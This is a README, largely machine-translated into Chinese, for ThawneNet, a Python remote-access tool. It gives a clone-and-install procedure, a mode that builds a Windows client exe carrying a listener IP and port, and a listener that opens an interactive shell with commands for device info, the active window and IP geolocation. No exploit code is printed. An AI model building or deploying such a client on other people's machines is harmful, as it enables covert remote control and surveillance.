ThawneNet
1.0.0
Thawnenet是一種工具,旨在遠程控制Windows系統並從中檢索信息。 Thawnenet是在Python Windows中為客戶端端開發的客戶端/服務器應用程序,服務器也位於Python中。

Thawnenet需要Python3
git clone https://github.com/cisamu123/ThawneNet.git
cd ThawneNET
pip install -r requirements.txt
```.
### Available Modes
* `--build` - for building the exe
* `--shell` - getting an interactive shell of the device
build模式用法:python3 server.py-建造
shell模式用法:python3 server.py-shell [flags] flags:-i,-ip listner ip地址-p, - port listner端口號碼
運行shell模式後,您將獲得該設備的解釋器
可以在解釋器上運行的命令
info --> returns basic info of the device
activeWindow --> returns active window
battery --> returns battery info
whois --> returns the ip, city, country etc of the device
clear --> clears the screen
exit --> exit the interpreter
使用所需的IP和端口構建EXE: python3 server.py --build
要獲取解釋器: python3 server.py --shell -i 0.0.0.0 -p 8000

BTC: bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH: 0x8d797249170d263B959A3c688D8456adBcfBC319
XMRT: 0xF978FE35d00A201eB48aB3908993e14f312001a2
Thawnenet獲得了MIT許可證的許可,請查看許可證以獲取更多信息。